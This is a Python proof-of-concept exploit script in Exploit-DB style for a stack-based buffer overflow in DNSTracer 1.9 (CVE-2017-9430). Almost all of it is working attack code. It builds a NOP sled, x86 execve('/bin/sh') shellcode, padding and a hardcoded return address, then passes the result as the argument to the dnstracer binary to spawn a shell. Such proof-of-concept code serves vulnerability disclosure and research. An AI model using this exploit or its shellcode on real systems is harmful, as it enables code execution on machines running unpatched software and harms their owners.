46 lines
No EOL
1.3 KiB
Python
Executable file
46 lines
No EOL
1.3 KiB
Python
Executable file
# Exploit Title: DNSTracer 1.9 - Buffer Overflow
|
|
# Google Dork: [if applicable]
|
|
# Date: 03-08-2017
|
|
# Exploit Author: j0lama
|
|
# Vendor Homepage: http://www.mavetju.org/unix/dnstracer.php
|
|
# Software Link: http://www.mavetju.org/download/dnstracer-1.9.tar.gz
|
|
# Version: 1.9
|
|
# Tested on: Ubuntu 12.04
|
|
# CVE : CVE-2017-9430
|
|
# Bug report: https://www.exploit-db.com/exploits/42115/
|
|
# Vulnerability analysis: http://jolama.es/temas/dnstracer-exploit/index.php
|
|
|
|
|
|
# Proof of Concept
|
|
import os
|
|
from subprocess import call
|
|
|
|
def run():
|
|
try:
|
|
print "\nDNSTracer Stack-based Buffer Overflow"
|
|
print "Author: j0lama"
|
|
print "Tested with Dnstracer compile without buffer overflow protection"
|
|
|
|
nops = "\x90"*1006
|
|
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
|
|
filling = "A"*24
|
|
eip = "\x2f\xeb\xff\xbf"
|
|
|
|
#buf size = 1057
|
|
buf = nops + shellcode + filling + eip
|
|
|
|
call(["./dnstracer", buf])
|
|
|
|
except OSError as e:
|
|
if e.errno == os.errno.ENOENT:
|
|
print "\nDnstracer not found!\n"
|
|
else:
|
|
print "\nError executing exploit\n"
|
|
raise
|
|
|
|
|
|
if __name__ == '__main__':
|
|
try:
|
|
run()
|
|
except Exception as e:
|
|
print "Something went wrong" |